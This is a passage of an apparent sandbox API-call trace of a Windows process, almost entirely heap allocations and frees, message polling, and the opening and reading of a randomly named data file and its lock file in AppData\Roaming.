lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0207.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0207.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0207.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0207.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0207.358] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.358] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.358] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.358] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.358] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/ynNikGKB3oJVJW2VhiLE.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ynnikgkb3ojvjw2vhile.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0207.359] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.359] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0207.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0207.359] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.359] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.359] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0207.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.360] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.ynNikGKB3oJVJW2VhiLE.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.ynnikgkb3ojvjw2vhile.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0207.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0207.360] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.360] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.360] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0207.361] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0207.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.361] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0207.361] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0xf044, lpOverlapped=0x0) returned 1 [0207.363] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0207.366] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf044) returned 0x24d7a58 [0207.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0207.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0207.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.368] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0207.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0207.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0207.368] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0207.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0207.368] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0207.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0207.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0207.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf044) returned 0x24d7a58 [0207.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0207.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1818 [0207.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0207.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0207.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0207.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1838 [0207.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0207.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0207.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0207.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0207.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0207.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0207.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf044) returned 0x34c12a0 [0207.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0207.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0207.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0207.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0207.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0207.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0207.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0207.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0207.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0207.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0207.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0207.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0207.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0207.373] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 1 [0207.373] TranslateMessage (lpMsg=0x8bf3c0) returned 0 [0207.373] DispatchMessageW (lpMsg=0x8bf3c0) returned 0x0 [0207.373] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0207.373] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0207.374] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0207.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0207.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0207.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0207.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.374] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0207.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0207.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0207.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0207.375] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0207.375] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0207.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0207.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0207.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0207.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0207.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0207.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0207.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.376] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0207.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0207.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0207.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0207.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.376] RtlAllocateHeap 